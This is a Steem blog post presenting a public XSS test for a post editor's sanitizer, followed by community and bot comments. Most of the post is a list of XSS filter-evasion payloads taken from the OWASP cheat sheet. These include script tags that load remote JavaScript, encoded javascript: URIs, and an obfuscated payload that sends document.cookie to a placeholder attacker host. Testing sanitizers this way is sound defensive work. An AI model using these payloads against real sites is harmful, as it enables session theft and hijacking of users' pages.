This post acts as a public XSS Security Test for my upcoming Post Editor on SteemWorld. Of course, it can be used to test against many different XSS attacks on other platforms as well. If you should see a message stating 'XSS', the Steem platform you are using may not be secure and the developers need to be contacted immediately.
Since I recently finished the Sanitizer Module of my HTML Parser for the Editor, it's now time to test different scripting attacks and I think it is a good idea to have a post to be able to easily test any coming changes in future. A few things might still be added in the next few days.
I've spent some time checking the official XSS Filter Evasion Cheat Sheet (last revision: 02/23/2019) and included the relevant attacks in this post.
<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
javascript:/--><svg/onload='+/"/+/onmouseover=1/+/[/[]/+alert(1)//'>
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
javascript:/--><svg/onload='+/"/+/onmouseover=1/+/[/[]/+alert(1)//'>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<IMG SRC=javascript:alert("RSnake says, 'XSS'")>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG """>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG SRC= onmouseover="alert('xxs')">
<IMG SRC= onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))">
<img src=x onerror="javascript:alert('XSS')">
<IMG SRC=javascript:alert(
'XSS')>
<IMG SRC=javascript:alert(
'XSS')>
<IMG SRC=javascript:a&
#0000108ert('XSS')>
<IMG SRC=javascript:a&
#0000108ert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="  javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://xss.rocks/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://xss.rocks/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<
<SCRIPT SRC=http://xss.rocks/xss.js?< B >
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="livescript:[code]">
<svg/onload=alert('XSS')>
<svg/onload=alert('XSS')>
<BODY ONLOAD=alert('XSS')>
<BGSOUND SRC="javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://xss.rocks/xss.css">
<STYLE>@import'http://xss.rocks/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://xss.rocks/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://xss.rocks/xssmoz.xml#xss")}</STYLE>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
exp/*<A STYLE='no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<XSS STYLE="xss:expression(alert('XSS'))">
<XSS STYLE="behavior: url(xss.htc);">
¼script¾alert(¢XSS¢)¼/script¾
¼script¾alert(¢XSS¢)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"></DIV>
<DIV STYLE="width: expression(alert('XSS'));"></DIV>
(html comment removed: [if gte IE 4]>
<SCRIPT>alert('XSS');</SCRIPT>
<![endif])
(html comment removed: [if gte IE 4]>
<![endif])<BASE HREF="javascript:alert('XSS');//">
<OBJECT TYPE="text/x-scriptlet" DATA="http://xss.rocks/scriptlet.html"></OBJECT>
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
<XML ID="xss"><I><B><IMG SRC="javas(html comment removed: )cript:alert('XSS')"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<SCRIPT a=">" SRC="httx://xss.rocks/xss.js"></SCRIPT>
<img onload="eval(atob('ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9saXN0ZXJuSVAvIitkb2N1bWVudC5jb29raWU='))">
If you are a developer and you should need help in protecting your app against such attacks, feel free to leave me a message ;)
Just to be safe,
Der erste (fach-)chinesische Post den ich komplett durchgescrollt habe :))
könnte aber auch klingonisch oder romulanisch sein!
LG
Downvoting a post can decrease pending rewards and make it less visible. Common reasons:
Submit
Ich verstehe zwar nicht komplett - trotzdem danke dir für deine Arbeit! ;)
Posted using Partiko Android
Downvoting a post can decrease pending rewards and make it less visible. Common reasons:
Submit
Thanks keeping us safe.
Downvoting a post can decrease pending rewards and make it less visible. Common reasons:
Submit
Yes, there must be a proper security to ensure that the apps should be safe.
Downvoting a post can decrease pending rewards and make it less visible. Common reasons:
Submit
This post has been included in the latest edition of SoS Daily News - a digest of all the latest news on the Steem blockchain.
Downvoting a post can decrease pending rewards and make it less visible. Common reasons:
Submit
You received an automatic vote, because I believe in you and I love what you create! ;)
A huge hug from @amico! 🤗
I love promoting !sbi status
Downvoting a post can decrease pending rewards and make it less visible. Common reasons:
Submit
Hi @amico!
Did you know Steem Basic Income has a Quality Policy?
Downvoting a post can decrease pending rewards and make it less visible. Common reasons:
Submit
Great work. @SteemChiller
Resteemed.
Posted using Partiko iOS
Downvoting a post can decrease pending rewards and make it less visible. Common reasons:
Submit
On a completely different note . . . I've noticed that when I edit a post, if it has a self vote steemworld counts it again. Is it possible to make it so it the vote only gets counted once? The way it works currently means my self vote level shows as higher than it truly is.
No idea how easy or not that is to do but thought I'd mention it.
Thanks for all the great work you do. 😊
Downvoting a post can decrease pending rewards and make it less visible. Common reasons:
Submit
I checked your self-vote rate and it seems to be correct. You created 7 posts and voted all of them with 100% (I couldn't even find an edited post). Since you only vote yourself and @artysteps (Looks like another account by you) with 100% and you vote all other accounts with 10-50%, I think your self-vote rate should in fact be much higher (at least 45%).
Keep in mind that on some day you might get flagged heavily by some whales for that ;)
Downvoting a post can decrease pending rewards and make it less visible. Common reasons:
Submit
Hmmm. Ok. But I'm not sure why you can't see any edited some posts I definitely corrected a couple of spelling mistakes. Not important though. Thanks for checking.
Downvoting a post can decrease pending rewards and make it less visible. Common reasons:
Submit
This post has been just added as new item to timeline of SteemWorld on Steem Projects.
If you want to be notified about new updates from this project, register on Steem Projects and add SteemWorld to your favorite projects.
Downvoting a post can decrease pending rewards and make it less visible. Common reasons:
Submit
I used steemworld today for looking up Some info for my blog today so thanks for making it easier with steemworld
Gr. Britt
Downvoting a post can decrease pending rewards and make it less visible. Common reasons:
Submit
Hi @steemchiller!
Your post was upvoted by @steem-ua, new Steem dApp, using UserAuthority for algorithmic post curation!
Your UA account score is currently 6.244 which ranks you at #236 across all Steem accounts.
Your rank has improved 1 places in the last three days (old rank 237).
In our last Algorithmic Curation Round, consisting of 182 contributions, your post is ranked at #12.
Evaluation of your UA score:
Feel free to join our @steem-ua Discord server
Downvoting a post can decrease pending rewards and make it less visible. Common reasons:
Submit
You just rose by 20.17% upvote from @curationhelper courtesy of @der-prophet
Downvoting a post can decrease pending rewards and make it less visible. Common reasons:
Submit